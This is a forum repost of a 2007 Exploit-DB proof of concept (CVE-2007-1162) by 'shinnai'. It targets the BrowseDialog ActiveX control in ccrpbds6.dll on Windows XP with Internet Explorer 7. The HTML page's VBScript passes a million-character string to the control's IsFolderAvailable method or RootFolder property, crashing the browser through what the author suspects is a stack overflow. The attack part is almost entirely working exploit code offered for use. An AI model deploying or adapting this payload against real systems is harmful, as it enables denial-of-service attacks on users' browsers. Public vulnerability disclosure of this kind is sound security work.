Exploit BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3350
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-1162
Дата публикации
2007-02-21
HTML:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Soundtrack: "Zeta Reticoli" (Meganoidi)
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 I found other two methods in this dll that are unable to handle long string.
 It seems to be a Stack Overflow, but I'm not sure of this :)
------------------------------------------------------------------------------


<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='BrowseDialog'></object>
<select style="width: 404px" name="Pucca">
  <option value = "IsFolderAvailable">IsFolderAvailable</option>
  <option value = "RootFolder">RootFolder</option>
  <option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="IsFolderAvailable" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.IsFolderAvailable arg1
     BrowseDialog.IsFolderAvailable arg1
   elseif Pucca.value="RootFolder" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.RootFolder = arg1
     BrowseDialog.RootFolder = arg1
   else
     MsgBox "Brucia ancora che prima o poi ritornerò" & vbCrLf & _
     "Conservo di nascosto sempre lo stesso smalto" & vbCrLf &_
     "Non temere zeta reticoli on my mind" & vbCrLf &_
     "Aspetterò il momento per un migliore slancio"
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-02-21]
 
Источник
www.exploit-db.com

Похожие темы